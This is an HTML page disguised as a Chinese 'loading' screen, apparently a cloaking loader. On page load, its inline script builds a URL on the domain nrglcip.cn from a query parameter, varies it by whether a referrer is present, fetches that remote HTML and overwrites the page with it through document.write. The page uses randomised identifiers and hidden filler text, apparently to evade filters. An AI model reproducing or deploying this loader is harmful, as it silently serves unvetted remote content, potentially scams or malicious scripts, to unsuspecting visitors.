<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Yn4jZzIKc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Yn4jZzIKc .Z5mnu5ONn {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Yn4jZzIKc .content {
            line-height: 50px;
            text-align: center
        }

        .Yn4jZzIKc .img {
            width: 100%
        }

        .Yn4jZzIKc .stJHBW46l {
            text-align: center
        }

        .Yn4jZzIKc .stJHBW46l span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Yn4jZzIKc .stJHBW46l span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Yn4jZzIKc .stJHBW46l span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Yn4jZzIKc .stJHBW46l span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Yn4jZzIKc .stJHBW46l span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Yn4jZzIKc .stJHBW46l span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Yn4jZzIKc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function pyBIjaZrjQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Un9mh = pyBIjaZrjQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Un9mh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Un9mh +".html?a=share";
		}
		
        n9I7Ldo=url+"#"+new Date().getTime();
        n9I7Ldo && function() {
            $.get(n9I7Ldo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >gBJOlMMewclWiHI</ul>
<div style='display:none'>xhO7Pkuu6X7QURNEP0F5yW2VZVAled6CgzFCq2</div>
<div style='display:none'>xhO7Pkuu6X7QURNEP0F5yW2VZVAled6CgzFCq2</div>
<div style='display:none'>xhO7Pkuu6X7QURNEP0F5yW2VZVAled6CgzFCq2</div><div class="Yn4jZzIKc">
    <div class="Z5mnu5ONn">
        <div class="stJHBW46l">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>O3IoWtRJ40HOtb6wIEGVQNoN86iDQHyk164MlZBkLRnv3RJNjKYONm6Qcm7B</p>
<div style='display:none'>FPHpmDS9HjeDs3zOtA6iPqD5Xks8hX3RIYqIxExf65hbOiG</div>
<span style='display:none'>USyq0OPTIuzuwuR4EHiXMXM7CwiYqTbVU4FB</span>
<b style='display:none' >CtPQL2qY1BWy6J6cCvxOgM9Ew2Fpkr1Rs5zSS8MOwhQzpCqDFTgFtP34FHtU0vrcXFGGUxUi2Nq61paMZVYM</b>
<ul style='display:none' >INsZopEiRORhNlHS13zuMeWMQk</ul>
<ul style='display:none' >INsZopEiRORhNlHS13zuMeWMQk</ul>
<h1 style='display:none' >r4ghA9Yo2ueuSNSqj</h1>
<ul style='display:none' >INsZopEiRORhNlHS13zuMeWMQk</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>X1K6cLaBbxTnGqMLN1elwWImb3yigaZAA4b9lKruBdGraoR6Kcd5cfe7wjhlTYJzhOVKcD800u</a></body>
</html>